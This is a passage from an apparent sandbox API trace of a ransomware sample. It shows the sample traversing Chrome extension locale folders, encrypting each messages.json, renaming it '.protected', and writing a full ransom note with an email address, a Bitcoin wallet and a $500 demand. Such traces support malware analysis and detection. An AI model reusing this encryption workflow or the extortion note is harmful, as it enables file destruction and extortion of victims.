HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.protected") returned 165 [0080.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.protected")) returned 1 [0080.112] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.112] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.112] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\RESTORE_FILES.txt") returned 159 [0080.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0080.112] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.112] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.113] lstrlenA (lpString="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") returned 684 [0080.113] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.113] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.113] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.114] CloseHandle (hObject=0x164) returned 1 [0080.114] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.114] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0080.114] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0080.114] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0080.114] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0080.114] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0080.114] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv") returned 141 [0080.114] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0080.114] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0080.114] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\*") returned 143 [0080.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0080.114] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.114] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.114] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.114] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.114] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.114] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\.") returned 143 [0080.114] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.114] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.114] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.114] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.114] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.114] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.114] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.114] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\..") returned 144 [0080.114] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.114] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.114] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.115] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.115] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.115] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.115] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.115] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.115] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json") returned 155 [0080.115] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.115] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.115] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.115] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.115] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json") returned 155 [0080.115] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.115] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json") returned 155 [0080.115] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.115] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json") returned 155 [0080.115] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.115] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.116] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.116] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.116] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.116] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.116] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.116] CloseHandle (hObject=0x168) returned 1 [0080.116] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.protected") returned 165 [0080.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.protected")) returned 1 [0080.117] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.117] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\RESTORE_FILES.txt") returned 159 [0080.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.117] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.117] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.118] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.118] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.118] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.118] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.118] CloseHandle (hObject=0x164) returned 1 [0080.118] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.118] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0080.118] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0080.118] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0080.118] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0080.118] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0080.118] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms") returned 141 [0080.118] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0080.119] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0080.119] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\*") returned 143 [0080.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.119] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.119] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.119] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.119] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.119] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.119] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\.") returned 143 [0080.119] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.119] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.119] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.119] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.119] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.119] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.119] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.119] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\..") returned 144 [0080.119] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.119] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.119] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.119] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.119] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.119] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.119] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.119] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.119] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json") returned 155 [0080.119] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.119] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.119] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.119] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json") returned 155 [0080.120] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json") returned 155 [0080.120] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json") returned 155 [0080.120] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.120] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0080.121] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.121] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0080.121] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.121] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.121] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.121] CloseHandle (hObject=0x168) returned 1 [0080.122] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.protected") returned 165 [0080.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.protected")) returned 1 [0080.122] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.122] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.122] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
